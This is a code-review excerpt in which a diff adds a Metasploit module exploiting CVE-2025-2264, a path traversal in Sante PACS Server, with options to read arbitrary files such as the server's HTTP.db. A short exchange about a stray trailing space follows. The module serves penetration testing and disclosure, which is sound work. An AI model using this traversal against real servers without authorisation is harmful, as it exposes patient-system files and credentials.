modules/auxiliary/gather/pacsserver_traversal.rb

```diff
@@ -0,0 +1,83 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sante PACS Server Path Traversal (CVE-2025-2264)',
+        'Description' => %q{
+          This module exploits a path traversal vulnerability (CVE-2025-2264) in Sante PACS Server <= v4.1.0 to retrieve arbitrary files from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-2264'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2025-08']
+        ],
+        'DisclosureDate' => '2025-03-13',
+        'DefaultOptions' => {
+          'RPORT' => 3000,
+          'SSL' => 'False'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for PACS Server', '/']),
+        OptString.new('FILE', [false, 'The file path to read from the target system.', '/.HTTP/HTTP.db']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 3 ])
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.html ')
```

Comment:
Confirming: the trailing space is intentional?

```suggestion
        'uri' => normalize_uri(target_uri.path, 'index.html')
```

Reply:
No, that wasn't intentional, thank you.